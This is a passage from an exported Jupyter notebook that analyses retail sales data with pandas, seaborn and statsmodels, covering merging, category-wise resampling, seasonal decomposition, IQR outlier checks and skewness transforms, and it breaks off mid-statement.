In[2]:\n\n\ntrain_df=pd.read_csv(r\"C:\\Users\\HP\\Downloads\\tcs projec dataset\\train_data.csv\")\n\n\n# In[3]:\n\n\ntest_df=pd.read_csv(r\"C:\\Users\\HP\\Downloads\\tcs projec 
dataset\\test_data.csv\")\n\n\n# In[4]:\n\n\nprice_df=pd.read_csv(r\"C:\\Users\\HP\\Downloads\\tcs projec dataset\\product_prices.csv\")\n\n\n# In[5]:\n\n\ndate_df=pd.read_csv(r\"C:\\Users\\HP\\Downloads\\tcs projec dataset\\date_to_week_id_map.csv\")\n\n\n# In[6]:\n\n\nsample_df=pd.read_csv(r\"C:\\Users\\HP\\Downloads\\tcs projec dataset\\sample_submission.csv\")\n\n\n# In[7]:\n\n\ntrain_df\n\n\n# In[8]:\n\n\ntest_df\n\n\n# In[9]:\n\n\nprice_df\n\n\n# In[10]:\n\n\ndate_df\n\n\n# In[11]:\n\n\nsample_df\n\n\n# ## Joining the datasets with common column\n\n# In[12]:\n\n\ntrain_df.columns\n\n\n# In[13]:\n\n\n#joining price and date datasets using inner join\n\ndf=pd.merge(price_df,date_df, on=['week_id'], how='inner')\n\n\n# In[14]:\n\n\ndf1=pd.merge(train_df,df, on=['date','product_identifier','outlet'], how='inner')\ndf1.head()\n\n\n# # ----------------------------------------------------------------------------------\n\n# # Data Analysis\n\n# In[15]:\n\n\ndf1.shape\n\n\n# In[16]:\n\n\ndf1.info()\n\n\n# In[17]:\n\n\ndf1.describe()\n\n\n# In[18]:\n\n\n# Checking for Null Values\ndf1.isna().sum()\n\n\n# In[19]:\n\n\ndf1.columns\n\n\n# In[20]:\n\n\n#checking the cloumns having Dtype 'O'\n\n\n# In[21]:\n\n\ndf1['category_of_product'].unique()\n\n\n# In[22]:\n\n\ndf1['state'].unique()\n\n\n# In[23]:\n\n\n#converting the date column data type to data and time\n\n\n# In[24]:\n\n\ndata=df1.copy()\n\n\n# In[25]:\n\n\ndata1=df1.copy()\n\n\n# In[26]:\n\n\ndata['date'] = pd.to_datetime(data['date'])\n\n\n# In[27]:\n\n\ndata.info()\n\n\n# In[28]:\n\n\n# Setting index to 'datetime'\ndata.set_index('date', inplace=True)\n\n\n# In[29]:\n\n\ndata\n\n\n# # --------------------------------------------------------------------------------------------\n\n# # Feature Engineering\n\n# In[30]:\n\n\ndata=data.reset_index('date')\n\n\n# In[31]:\n\n\n# Extracting additional features from 'date'\ndata['year'] = pd.to_datetime(data['date']).dt.year\ndata['month'] = pd.to_datetime(data['date']).dt.month\ndata['day'] = pd.to_datetime(data['date']).dt.day\n\n\n# In[32]:\n\n\ndata=data.set_index('date')\n\n\n# In[33]:\n\n\ndata\n\n\n# In[34]:\n\n\n# Grouping feature into categorical data and numerical data\n\n\n# In[35]:\n\n\ndata.info()\n\n\n# In[36]:\n\n\ncategorical_features=[features for features in data.columns if data[features].dtypes==\"O\"]\n\n\n# In[37]:\n\n\nnumerical_features=[features for features in data.columns if data[features].dtypes!=\"O\" and features not in ['date','year', 'month','day','week_id']]\nnumerical_features\n\n\n# In[38]:\n\n\n#Seperating numerical features into contionus and discrete features.\ncontinous_features=[features for features in numerical_features if len(data[features].unique()) > 50 ]\n\n\n# In[39]:\n\n\ndiscrete_features =[features for features in numerical_features if len(data[features].unique()) <= 50]\n\n\n# In[40]:\n\n\ncategorical_features\n\n\n# In[41]:\n\n\ncontinous_features\n\n\n# In[42]:\n\n\ndiscrete_features\n\n\n# # ----------------------------------------------------------------------------\n\n# ### Splitting Dataset based on Category of Product\n\n# In[43]:\n\n\ndata['category_of_product'].unique()\n\n\n# ## Drinks and Food\n\n# In[44]:\n\n\n#Now we create a dataframe which includes only data related to drinks_and_food sales. 
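# (Boolean masking with .loc keeps only the rows of this category; the same
# filter -> sort -> groupby('date').sum() -> resample('MS').mean() pipeline is
# repeated for the other two categories below.)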
\ndrinks_and_food= data.loc[data['category_of_product'] == 'drinks_and_food']\ndrinks_and_food\n\n\n# In[45]:\n\n\n#Now let's sort drinks_and_food dataframe according to date\ndrinks_and_food = drinks_and_food.sort_values('date')\ndrinks_and_food\n\n\n# In[46]:\n\n\n#Now let's find how much total drinks_and_food sales occurred on each date\ndrinks_and_food1 =drinks_and_food.groupby('date')['sales'].sum().reset_index('date')\n\n\n# In[47]:\n\n\ndrinks_and_food1\n\n\n# In[48]:\n\n\n#Now let's set the date column as the index column\ndrinks_and_food1 = drinks_and_food1.set_index('date')\ndrinks_and_food1\n\n\n# In[49]:\n\n\n#Now let's see whether there is any frequency in the dataframe\ndrinks_and_food1.index\n\n\n# In[50]:\n\n\n#Now let's resample the data into means of monthly sales of drinks_and_food and save this into a new variable called date\ny_drinks_and_food = drinks_and_food1['sales'].resample('MS').mean()\ny_drinks_and_food\n\n\n# In[51]:\n\n\n#Now let's check the monthly sales value happened in year 2013\nprint(y_drinks_and_food['2013':])\n\n\n# ## Fast Moving Consumer Goods\n\n# In[52]:\n\n\n#Now we create a dataframe which includes only data related to drinks_and_food sales. \nfast_moving_consumer_goods= data.loc[data['category_of_product'] == 'fast_moving_consumer_goods']\nfast_moving_consumer_goods\n\n\n# In[53]:\n\n\n#Now let's sort fast_moving_consumer_goods dataframe according to date\nfast_moving_consumer_goods= fast_moving_consumer_goods.sort_values('date')\nfast_moving_consumer_goods\n\n\n# In[54]:\n\n\n#Now let's find how much total fast_moving_consumer_goods sales occurred on each date\nfast_moving_consumer_goods1 =fast_moving_consumer_goods.groupby('date')['sales'].sum().reset_index()\n\n\n# In[55]:\n\n\nfast_moving_consumer_goods1\n\n\n# In[56]:\n\n\n#Now let's set the date column as the index column\nfast_moving_consumer_goods1 = fast_moving_consumer_goods1.set_index('date')\nfast_moving_consumer_goods1\n\n\n# In[57]:\n\n\n#Now let's see whether there is any frequency in the dataframe\nfast_moving_consumer_goods1.index\n\n\n# In[58]:\n\n\n#Now let's resample the data into means of monthly sales of fast_moving_consumer_goods and save this into a new variable called date\ny_fast_moving_consumer_goods = fast_moving_consumer_goods1['sales'].resample('MS').mean()\ny_fast_moving_consumer_goods\n\n\n# In[59]:\n\n\n#Now let's check the monthly sales value happened in year 2013\nprint(y_fast_moving_consumer_goods['2013':])\n\n\n# ## Others\n\n# In[60]:\n\n\n#Now we create a dataframe which includes only data related to others sales. 
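# (Same filter/sort/group/resample pipeline as above, applied here to the 'others' category.)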
\nothers= data.loc[data['category_of_product'] == 'others']\nothers\n\n\n# In[61]:\n\n\n#Now let's sort others dataframe according to date\nothers = others.sort_values('date')\nothers\n\n\n# In[62]:\n\n\n#Now let's find how much total others sales occurred on each date\nothers1 =others.groupby('date')['sales'].sum().reset_index()\n\n\n# In[63]:\n\n\nothers1\n\n\n# In[64]:\n\n\n#Now let's set the date column as the index column\nothers1 = others1.set_index('date')\nothers1\n\n\n# In[65]:\n\n\n#Now let's see whether there is any frequency in the dataframe\nothers1.index\n\n\n# In[66]:\n\n\n#Now let's resample the data into means of monthly sales of others and save this into a new variable called date\ny_others = others1['sales'].resample('MS').mean()\ny_others\n\n\n# In[67]:\n\n\n#Now let's check the monthly sales value happened in year 2013\nprint(y_others['2013':])\n\n\n# ## Arranging Data Product-wise\n\n# In[68]:\n\n\nsales_grouped = data.groupby(['product_identifier', 'date']).sum()\n\n#sales_grouped\n\n# Group the sales by product identifier and date\nsales_grouped = pd.pivot_table(data, values='sales', index='date', columns='product_identifier', aggfunc=sum)\n\n\n#sales_grouped\n\nsales_monthly = sales_grouped.resample('MS').mean()\n\nsales_monthly\n\n#sales_monthly.info()\n\n\n# In[69]:\n\n\nprice_grouped = data.groupby(['product_identifier', 'date']).sum()\n\n#sales_grouped\n\n# Group the sales by product identifier and date\nprice_grouped = pd.pivot_table(data, values='sell_price', index='date', columns='product_identifier', aggfunc=sum)\n\n\n#sales_grouped\n\nprice_monthly = price_grouped.resample('MS').mean()\n\nprice_monthly\n\n#sales_monthly.info()\n\n\n# # ----------------------------------------------------------------------------------------\n\n# # DATA VISUALIZATION\n\n# ### Plotting the sales data for each categories\n\n# In[70]:\n\n\ndrinks_and_food1.plot(figsize=(20,5))\n\n\n# In[71]:\n\n\nfast_moving_consumer_goods1.plot(figsize=(20,5))\n\n\n# In[72]:\n\n\nothers1.plot(figsize=(20,5))\n\n\n# # Plotting the mean sales data for each categories\n\n# In[73]:\n\n\ny_drinks_and_food.plot(figsize=(15,6))\nplt.title(\"drinks_and_food supplies sales\")\nplt.ylabel(\"Sales\")\nplt.show()\n\n\n# In[74]:\n\n\ny_fast_moving_consumer_goods.plot(figsize=(15,6))\nplt.title(\"fast_moving_consumer_goods supplies sales\")\nplt.ylabel(\"Sales\")\nplt.show()\n\n\n# In[75]:\n\n\ny_others.plot(figsize=(15,6))\nplt.title(\"others supplies sales\")\nplt.ylabel(\"Sales\")\nplt.show()\n\n\n# # ------------------------------------------------------------------------------------\n\n# # Performing ETS Decomposition\n\n# # a) Drinks and Food\n\n# In[76]:\n\n\nfrom pylab import rcParams\nrcParams['figure.figsize']=18,8\ndecomposition_drinks_and_food = sm.tsa.seasonal_decompose(y_drinks_and_food,model='additive')\nfig = decomposition_drinks_and_food.plot()\nplt.show()\n\n\n# In[77]:\n\n\ndecomposition_drinks_and_food.trend.plot(figsize=(18,5))\n\n\n# In[78]:\n\n\ndecomposition_drinks_and_food.seasonal.plot(figsize=(18,5))\n\n\n# # b) Fast MovingConsumer Goods\n\n# In[79]:\n\n\nfrom pylab import rcParams\nrcParams['figure.figsize']=18,8\ndecomposition_fast_moving_consumer_goods = sm.tsa.seasonal_decompose(y_fast_moving_consumer_goods,model='additive')\nfig = decomposition_fast_moving_consumer_goods.plot()\nplt.show()\n\n\n# In[80]:\n\n\ndecomposition_fast_moving_consumer_goods.trend.plot(figsize=(18,5))\n\n\n# In[81]:\n\n\ndecomposition_fast_moving_consumer_goods.seasonal.plot(figsize=(18,5))\n\n\n# ## 
c) Others\n\n# In[82]:\n\n\nfrom pylab import rcParams\nrcParams['figure.figsize']=18,8\ndecomposition_others = sm.tsa.seasonal_decompose(y_others,model='additive')\nfig = decomposition_others.plot()\nplt.show()\n\n\n# In[83]:\n\n\ndecomposition_others.trend.plot(figsize=(18,5))\n\n\n# In[84]:\n\n\ndecomposition_others.seasonal.plot(figsize=(18,5))\n\n\n# In[85]:\n\n\nimport itertools\nimport statsmodels.api as sm\nfrom statsmodels.tsa.seasonal import seasonal_decompose\nimport matplotlib.pyplot as plt\n\nfor col in sales_monthly.columns:\n y = sales_monthly.loc[:, [col]]\n var_index = y.columns[0] # Get the variable index\n\n # Perform time series decomposition\n result = seasonal_decompose(y, model='additive', period=12)\n\n # Plot the decomposition\n fig, (ax1, ax2, ax3, ax4) = plt.subplots(4, 1, figsize=(10, 8))\n fig.suptitle('Time series decomposition of Average Sales for product ID {}'.format(var_index))\n ax1.set_ylabel('Observed')\n ax1.plot(y.index, y)\n ax2.set_ylabel('Trend')\n ax2.plot(y.index, result.trend)\n ax3.set_ylabel('Seasonal')\n ax3.plot(y.index, result.seasonal)\n ax4.set_ylabel('Residual')\n ax4.plot(y.index, result.resid)\n plt.show()\n\n\n# NOTE:Every product and category has seasonality\n\n# # ---------------------------------------------------------------------------\n\n# # Data visualization -part2\n\n# In[86]:\n\n\nsales_per_month=data['sales'].resample('M').sum()\nsales_per_day=data['sales'].resample('D').sum()\n\n\n# In[87]:\n\n\n# Plotting total sales per month\n\nplt.figure(figsize=(15,7))\nplt.title(\"Sales per month\")\nsns.lineplot(data = sales_per_month, dashes=False)\nplt.show()\n\n\n# In[88]:\n\n\n# Plotting total sales per day\n\nplt.figure(figsize=(15,7))\nplt.title(\"Sales per day\")\nsns.lineplot(data = sales_per_day, dashes=False)\nplt.show()\n\n\n# In[89]:\n\n\n# Plotting the Distribution of total sales data\n\nplt.figure(figsize=(8,6))\nsns.distplot(sales_per_month)\nplt.title('Total Sales Distribution')\nplt.show()\n\n\n# In[90]:\n\n\n# Plotting the Distribution of total sales per day data\n\nplt.figure(figsize=(8,6))\nsns.distplot(sales_per_day)\nplt.title('Total Sales per day Distribution')\nplt.show()\n\n\n# In[91]:\n\n\ndata=data.reset_index()\n\n\n# In[92]:\n\n\ndata['date'] = pd.to_datetime(data['date'])\n# Setting index to 'datetime'\ndata.set_index('date', inplace=True)\n\n\n# In[93]:\n\n\ncategory_data = data[data['category_of_product'] == 'drinks_and_food']\n\n# Group data by month and calculate the average sell price for each month\nmonthly_avg_sell_price = category_data.resample('M')['sell_price'].mean()\n\n# Plot the results\nplt.figure(figsize=(12,6))\nsns.lineplot(x=monthly_avg_sell_price.index, y=monthly_avg_sell_price)\nplt.title('Average selling price of drinks and food')\nplt.xlabel('Month')\nplt.ylabel('Average sell price')\nplt.show()\n\n\n# In[94]:\n\n\ndata = data.reset_index()\n\n\n# In[95]:\n\n\n# Group the data by month and calculate the mean selling price for each month\nmonthly_data = data.groupby(pd.Grouper(key='date', freq='M')).mean()\n\n# Create a line plot of the average selling price per month\nplt.plot(monthly_data.index, monthly_data['sell_price'])\n\n# Set the x-axis label\nplt.xlabel('Month')\n\n# Set the y-axis label\nplt.ylabel('Average Selling Price')\n\n# Set the title\nplt.title('Average Selling Price per Month')\n\n# Show the plot\nplt.show()\n\n\n# In[96]:\n\n\ntotal_sales = data.groupby('state')['sales'].sum().reset_index()\n\n# Sort values by sales in descending order\ntotal_sales = 
total_sales.sort_values(by='sales', ascending=False)\n\ncolors = ['orange','purple', 'green']\n\n\n\n# Create vertical bar plot\nfig, ax = plt.subplots(figsize=(8,6))\nax.bar(total_sales['state'], total_sales['sales'],width=0.8, color=colors)\n\n# Set labels and title\nax.grid(False)\nax.set_xlabel('State')\nax.set_ylabel('Total Sales')\nax.set_title('Total Sales per State')\n\nplt.show()\n\n\n# In[97]:\n\n\ntotal_sales = data.groupby('category_of_product')['sales'].sum().reset_index()\n\n# Sort values by sales in descending order\ntotal_sales = total_sales.sort_values(by='sales', ascending=False)\n\ncolors = ['black','blue', 'brown']\n\n\n\n# Create vertical bar plot\nfig, ax = plt.subplots(figsize=(8,6))\nax.bar(total_sales['category_of_product'], total_sales['sales'],width=0.8, color=colors)\n\n# Set labels and title\nax.grid(False)\nax.set_xlabel('Category of product')\nax.set_ylabel('Total Sales')\nax.set_title('Total Sales per category')\n\nplt.show()\n\n\n# In[98]:\n\n\naverage_price = data.groupby('category_of_product')['sell_price'].mean().reset_index()\n\n# Sort values by selling price in descending order\naverage_price = average_price.sort_values(by='sell_price', ascending=False)\n\ncolors = ['blue', 'brown','black']\n\n\n\n# Create vertical bar plot\nfig, ax = plt.subplots(figsize=(8,6))\nax.bar(average_price['category_of_product'], average_price['sell_price'],width=0.8, color=colors)\n\n# Set labels and title\nax.grid(False)\nax.set_xlabel('Category of product')\nax.set_ylabel('Average_selling_price')\nax.set_title('Average selling price per category')\n\nplt.show()\n\n\n# In[99]:\n\n\nplt.figure(figsize=(8,6))\nsns.barplot(x=data['department_identifier'], y=data['sales'])\nplt.title('Sales by different Departments')\nplt.show()\n\n\n# In[100]:\n\n\n# Plotting average sales with respect to outlets in a day\n\nplt.figure(figsize=(12,6))\nsns.barplot(x=data['outlet'], y=data['sales'])\nplt.title('average sales at different outlets in a day')\nplt.show()\n\n\n# In[101]:\n\n\n# Plotting average selling price with respect to departments \n\nplt.figure(figsize=(12,6))\nsns.barplot(x=data['department_identifier'], y=data['sell_price'])\nplt.title('average selling price of different department ')\nplt.show()\n\n\n# In[102]:\n\n\nplt.figure(figsize=(12,6))\nsns.barplot(x=data['product_identifier'], y=data['sell_price'])\nplt.title('Selling price of different products')\nplt.xticks(rotation=90)\nplt.show()\n\n\n# In[103]:\n\n\n# Plotting average selling price with respect to products\n\nplt.figure(figsize=(20,10))\nsns.barplot(x=data['product_identifier'], y=data['sell_price'],hue=data['category_of_product'])\nplt.title('average selling price of different products')\nplt.xticks(rotation=45)\nplt.show()\n\n\n# In[104]:\n\n\n# Plotting average sales with respect to products in a day\n\nplt.figure(figsize=(20,15))\nsns.barplot(x=data['product_identifier'], y=data['sales'],hue=data['category_of_product'])\nplt.title('average sales of products in a day')\nplt.xticks(rotation=45,ha='right')\nplt.show()\n\n\n# In[105]:\n\n\nprice_per_month = data.groupby(['year', 'month'])['sell_price'].mean().reset_index()\n\n# Filter the data for the two years you want to compare\nyear1_price = price_per_month[price_per_month['year'] == 2012]\nyear2_price = price_per_month[price_per_month['year'] == 2013]\nyear3_price = price_per_month[price_per_month['year'] == 2014]\n\n# Plot a line graph of the sales for each month in the two years\nplt.plot(year1_price['month'], year1_price['sell_price'], 
label='2012')\nplt.plot(year2_price['month'], year2_price['sell_price'], label='2013')\nplt.plot(year3_price['month'], year3_price['sell_price'], label='2014')\nplt.xlabel('Month')\nplt.ylabel('Average Selling Price')\nplt.title('Price Comparison between years 2012,2013 and 2014')\nplt.legend()\nplt.show()\n\n\n# In[106]:\n\n\nimport seaborn as sns\nimport matplotlib.pyplot as plt\ndata5=data.copy()\ndata5=data5.reset_index()\n# Filter the data for the desired category\ncategory_data = data5[data5['category_of_product'] == 'drinks_and_food']\n\n# Extract the year and month from the 'date' column\ncategory_data['year'] = category_data['date'].dt.year\ncategory_data['month'] = category_data['date'].dt.month\n\n# Group the data by year and month, and calculate the average selling price\navg_price = category_data.groupby(['year', 'month'])['sell_price'].mean().reset_index()\n\n# Plot the average selling price per month for each year using a line plot\nplt.figure(figsize=(12, 6))\nsns.lineplot(x='month', y='sell_price', hue='year', data=avg_price)\nplt.title('Average Selling Price per Month for ' + category_data['category_of_product'].iloc[0])\nplt.xlabel('Month')\nplt.ylabel('Average Selling Price')\nplt.show()\n\n\n# In[107]:\n\n\nimport seaborn as sns\nimport matplotlib.pyplot as plt\ndata5=data.copy()\ndata5=data5.reset_index()\n# Filter the data for the desired category\ncategory_data = data5[data5['category_of_product'] == 'fast_moving_consumer_goods']\n\n# Extract the year and month from the 'date' column\ncategory_data['year'] = category_data['date'].dt.year\ncategory_data['month'] = category_data['date'].dt.month\n\n# Group the data by year and month, and calculate the average selling price\navg_price = category_data.groupby(['year', 'month'])['sell_price'].mean().reset_index()\n\n# Plot the average selling price per month for each year using a line plot\nplt.figure(figsize=(12, 6))\nsns.lineplot(x='month', y='sell_price', hue='year', data=avg_price)\nplt.title('Average Selling Price per Month for ' + category_data['category_of_product'].iloc[0])\nplt.xlabel('Month')\nplt.ylabel('Average Selling Price')\nplt.show()\n\n\n# In[108]:\n\n\nimport seaborn as sns\nimport matplotlib.pyplot as plt\ndata5=data.copy()\ndata5=data5.reset_index()\n# Filter the data for the desired category\ncategory_data = data5[data5['category_of_product'] == 'others']\n\n# Extract the year and month from the 'date' column\ncategory_data['year'] = category_data['date'].dt.year\ncategory_data['month'] = category_data['date'].dt.month\n\n# Group the data by year and month, and calculate the average selling price\navg_price = category_data.groupby(['year', 'month'])['sell_price'].mean().reset_index()\n\n# Plot the average selling price per month for each year using a line plot\nplt.figure(figsize=(12, 6))\nsns.lineplot(x='month', y='sell_price', hue='year', data=avg_price)\nplt.title('Average Selling Price per Month for ' + category_data['category_of_product'].iloc[0])\nplt.xlabel('Month')\nplt.ylabel('Average Selling Price')\nplt.show()\n\n\n# In[109]:\n\n\ndata['product_identifier'].unique()\n\n\n# In[110]:\n\n\nprod_id=[74, 337, 423, 432, 581, 611, 631, 659, 743, 797, 868,\n 904, 926, 972, 973, 1054, 1135, 1173, 1190, 1196, 1228, 1240,\n 1242, 1275, 1322, 1328, 1365, 1424, 1472, 1508, 1542, 1548, 1599,\n 1629, 1672, 1694, 1727, 1753, 2294, 2332, 2492, 2768, 2794, 2818,\n 2853, 2932, 2935, 3004, 3008, 3021]\nfor i in prod_id:\n product_data = data5[data5['product_identifier']==i]\n\n# Convert date column to 
datetime format\n product_data['date'] = pd.to_datetime(product_data['date'])\n\n# Create a column for year and month\n product_data['year_month'] = product_data['date'].dt.strftime('%Y-%m')\n\n# Calculate average selling price per month for each year\n avg_price = product_data.groupby([product_data['date'].dt.year, product_data['date'].dt.month]).mean()['sell_price']\n avg_price = avg_price.unstack(level=0)\n\n# Plot the comparison using line chart\n avg_price.plot(kind='line', figsize=(6,5), marker='o')\n\n# Set title and labels\n plt.title('Comparison of Average Selling Price of Product {} by Month'.format(i))\n plt.xlabel('Month')\n plt.ylabel('Average Selling Price')\n\n# Show plot\n plt.show()\n\n\n# In[111]:\n\n\nproduct_data = data5[data5['product_identifier']==2935] #put 50 products\n\n\n# Convert date column to datetime format\nproduct_data['date'] = pd.to_datetime(product_data['date'])\n\n# Create a column for year and month\nproduct_data['year_month'] = product_data['date'].dt.strftime('%Y-%m')\n\n# Calculate average selling price per month for each year\navg_price = product_data.groupby([product_data['date'].dt.year, product_data['date'].dt.month]).mean()['sell_price']\navg_price = avg_price.unstack(level=0)\n\n# Plot the comparison using line chart\navg_price.plot(kind='line', figsize=(12,6), marker='o')\n\n# Set title and labels\nplt.title('Comparison of Average Selling Price of Product 2935 by Month')\nplt.xlabel('Month')\nplt.ylabel('Average Selling Price')\n\n# Show plot\nplt.show()\n\n\n# In[112]:\n\n\n# Calculate total sales by category\nsales_by_category = data.groupby('category_of_product')['sales'].sum().reset_index()\n\n# Create a pie chart\nfig, ax = plt.subplots(figsize=(8, 8))\nax.pie(sales_by_category['sales'], labels=sales_by_category['category_of_product'], autopct='%1.1f%%', startangle=90)\n\n# Set title\nax.set_title('Sales by Category of Product')\n\nplt.show()\n\n\n# In[113]:\n\n\n# Calculate total sales per department\ntotal_sales = data.groupby('department_identifier')['sales'].sum().reset_index()\n\n# Create a pie chart\nfig, ax = plt.subplots(figsize=(8, 8))\nax.pie(total_sales['sales'], labels=total_sales['department_identifier'], autopct='%1.1f%%', startangle=90)\nplt.setp(ax.texts, rotation=330, va='center', ha='left')\n\n\n# Set title\nax.set_title('Sales per Department')\n\nplt.show()\n\n\n# In[114]:\n\n\nimport seaborn as sns\n\n# Group data by product identifier and calculate mean selling price and total sales\ngrouped_data = data.groupby('product_identifier').agg({'sell_price': 'mean', 'sales': 'sum'}).reset_index()\n\n# Create a regplot\nsns.regplot(x=grouped_data['sales'], y=grouped_data['sell_price'])\n\n# Set labels and title\nplt.xlabel('Total Sales')\nplt.ylabel('Mean Selling Price')\nplt.title('Relationship between Total Sales and Mean Selling Price')\n\nplt.show()#good fit\n\n\n# In[115]:\n\n\n# Calculate mean selling price per product\nmean_sell_price = data.groupby('product_identifier')['sell_price'].mean().reset_index()\n\n# Calculate total sales per product\ntotal_sales = data.groupby('product_identifier')['sales'].sum().reset_index()\n\n# Merge dataframes on product identifier\nmerged_df = pd.merge(mean_sell_price, total_sales, on='product_identifier')\n\n# Create scatterplot\nplt.figure(figsize=(8, 6))\nplt.scatter( merged_df['sales'],merged_df['sell_price'], alpha=0.5)\n\n# Set labels and title\nplt.ylabel('Mean Selling Price')\nplt.xlabel('Total Sales')\nplt.title('Total Sales vs. 
Mean Selling Price')\n\nplt.show()\n\n\n# In[116]:\n\n\nsns.pairplot(data[['product_identifier', 'department_identifier', 'category_of_product', 'outlet', 'state', 'sales', 'sell_price']])\n\n\n# # -------------------------------------------------------------------------------\n\n# # Correlation\n\n# In[117]:\n\n\ndata10=data.drop(['day','week_id','year','month'],axis=1)\ncorrmatrix = data10.corr()\nplt.subplots(figsize=(20,10))\nsns.heatmap(corrmatrix,annot=True,cmap = 'YlGnBu')\n\n\n# # Outlier Detection\n\n# In[118]:\n\n\nfor feature in continous_features:\n data.boxplot(column= feature )\n plt.xlabel(feature)\n plt.title(feature)\n plt.show()\n\n\n# In[119]:\n\n\nsns.set(style=\"whitegrid\")\nfig, ax = plt.subplots(figsize=(10,8))\n\nsns.boxplot(x=\"category_of_product\", y=\"sales\", data=data, ax=ax)\n\nax.set_title(\"Boxplot of Category of Product vs Sales\")\nax.set_xlabel(\"Category of Product\")\nax.set_ylabel(\"Sales\")\n\nplt.show()\n\n\n# In[120]:\n\n\ndef find_outliers_IQR(data):\n q1=data.quantile(0.25)\n q3=data.quantile(0.75)\n IQR=q3-q1\n outliers = data[((data<(q1-1.5*IQR)) | (data>(q3+1.5*IQR)))]\n \n return outliers\n\nfor feature in continous_features:\n outliers = find_outliers_IQR(data[feature])\n\n print(feature)\n print('number of outliers: '+ str(len(outliers)))\n print('max outlier value: '+ str(outliers.max()))\n print('min outlier value: '+ str(outliers.min()))\n print('% of outliers: '+ str(len(outliers)/(len(data[feature]))*100))\n print('\\n')\n\n\n\n# In[121]:\n\n\ndef find_outliers_IQR(x):\n q1 = x.quantile(0.25)\n q3 = x.quantile(0.75)\n IQR = q3 - q1\n outliers = x[((x< (q1 - 1.5 * IQR)) | (x > (q3 + 1.5 * IQR)))]\n\n return outliers\n\n# Set the product identifier for which you want to find outliers\nproduct_ids = [ 74, 337, 423, 432, 581, 611, 631, 659, 743, 797, 868,904, 926, 972, 973, 1054, 1135, 1173, 1190, 1196, 1228, 1240,1242, 1275, 1322,\n 1328, 1365, 1424, 1472, 1508, 1542, 1548, 1599,1629, 1672, 1694, 1727, 1753, 2294, 2332, 2492, 2768, 2794, 2818,2853, 2932, 2935, 3004, 3008, 3021]\n\nfor product_id in product_ids: \n product_data = data[data['product_identifier'] == product_id]\n\n # Find outliers for the 'sales' column of the filtered data\n outliers = find_outliers_IQR(product_data['sales'])\n\n # Print the results\n print('Product ID:', product_id)\n print('Number of outliers:', len(outliers))\n print('Max outlier value:', outliers.max())\n print('Min outlier value:', outliers.min())\n print('% of outliers:', len(outliers)/len(product_data)*100,'\\n')\n\n\n product_data.boxplot(by ='product_identifier', column =['sales'],figsize=(15,15), grid = False)\n plt.title(f'Boxplot of sale of product {product_id}')\n plt.show()\n\n\n# In[122]:\n\n\ndef find_outliers_IQR(x):\n q1 = x.quantile(0.25)\n q3 = x.quantile(0.75)\n IQR = q3 - q1\n outliers = x[((x< (q1 - 1.5 * IQR)) | (x > (q3 + 1.5 * IQR)))]\n\n return outliers\n\n# Set the product identifier for which you want to find outliers\nproduct_ids = [ 74, 337, 423, 432, 581, 611, 631, 659, 743, 797, 868,904, 926, 972, 973, 1054, 1135, 1173, 1190, 1196, 1228, 1240,1242, 1275, 1322,\n 1328, 1365, 1424, 1472, 1508, 1542, 1548, 1599,1629, 1672, 1694, 1727, 1753, 2294, 2332, 2492, 2768, 2794, 2818,2853, 2932, 2935, 3004, 3008, 3021]\n\nfor product_id in product_ids: \n product_data = data[data['product_identifier'] == product_id]\n\n # Find outliers for the 'sales' column of the filtered data\n outliers = find_outliers_IQR(product_data['sales'])\n\n # Print the results\n print('Product ID:', 
product_id)\n print('Number of outliers:', len(outliers))\n print('Max outlier value:', outliers.max())\n print('Min outlier value:', outliers.min())\n print('% of outliers:', len(outliers)/len(product_data)*100,'\\n')\n\n\n product_data.boxplot(by ='product_identifier', column =['sell_price'],figsize=(15,15), grid = False)\n plt.title(f'Boxplot of sell price of product {product_id}')\n plt.show()\n\n\n# # Skewness Detection\n\n# In[123]:\n\n\ndata[continous_features].agg(['skew', 'kurtosis']).transpose()\n\n\n# In[124]:\n\n\ny_drinks_and_food.skew()\n\n\n# In[125]:\n\n\ny_fast_moving_consumer_goods.skew()\n\n\n# In[126]:\n\n\ny_others.skew()\n\n\n# In[127]:\n\n\nfor i in sales_monthly:\n print(f'skewness of {i} product ( {sales_monthly[i].skew()} )')\n \n if sales_monthly[i].skew() > 1.5 or sales_monthly[i].skew() < -1.5 :\n print( f'product {i} is highly skewed \\n ')\n\n\n# # Box-Cox Transformation\n\n# In[128]:\n\n\ncols = [1542]\n#sales_monthly1=sales_monthly.copy()\nfor i in cols:\n sales_monthly[i] = sales_monthly[i].apply(lambda x: np.power(x, (1/1.5)))\n print(sales_monthly[i].skew())\n\n\n# In[129]:\n\n\ncols = [ 2294]\nfor i in cols:\n sales_monthly[i] = sales_monthly[i].apply(lambda x: np.power(x, (1/5)))\n print(sales_monthly[i].skew())\n\n\n# In[130]:\n\n\ncols = [ 926]\nfor i in cols:\n sales_monthly[i] = sales_monthly[i].apply(lambda x: np.power(x, (1/0.6)))\n print(sales_monthly[i].skew())\n\n\n# In[131]:\n\n\ncols = [1240,1672]\nfor i in cols:\n sales_monthly[i] = sales_monthly[i].apply(lambda x: np.power(x, (1/0.8)))\n print(sales_monthly[i].skew())\n\n\n# In[132]:\n\n\nfor i in sales_monthly:\n print(f'skewness of {i} product ( {sales_monthly[i].skew()} )')\n \n if sales_monthly[i].skew() > 1.5 or sales_monthly[i].skew() < -1.5 :\n print( f'product {i} is highly skewed \\n ')\n\n\n# In[133]:\n\n\nsales_monthly.describe().transpose()\n\n\n# # Distribution of numerical data\n\n# In[134]:\n\n\nfor i in continous_features:\n sns.distplot(data[i])\n plt.xlabel(i)\n plt.title(i)\n plt.show()\n\n\n# In[135]:\n\n\nfor i in sales_monthly.columns:\n plt.figure(figsize=(8, 6))\n sns.histplot(data=sales_monthly, x=i)\n plt.xlabel(i)\n plt.title(\"Distribution of \" +str(i))\n plt.show()\n\n\n# # Encoding category wise data\n\n# In[136]:\n\n\ndrinks_and_food_en = pd.get_dummies(drinks_and_food, columns=['category_of_product', 'state'])\n\n\n# In[137]:\n\n\nfast_moving_consumer_goods_en = pd.get_dummies(fast_moving_consumer_goods, columns=['category_of_product', 'state'])\n\n\n# In[138]:\n\n\nothers_en = pd.get_dummies(others, columns=['category_of_product', 'state'])\n\n\n# # -----------------------------------------------------------------------------------------\n\n# # Comparing Other Categories\n\n# In[139]:\n\n\ndfood1 = pd.DataFrame({'Order Date': y_drinks_and_food.index , 'Sales':y_drinks_and_food.values})\n\n\n# In[140]:\n\n\nfmcg1 = pd.DataFrame({'Order Date': y_fast_moving_consumer_goods.index , 'Sales':y_fast_moving_consumer_goods.values})\n\n\n# In[141]:\n\n\nothers1 = pd.DataFrame({'Order Date': y_others.index , 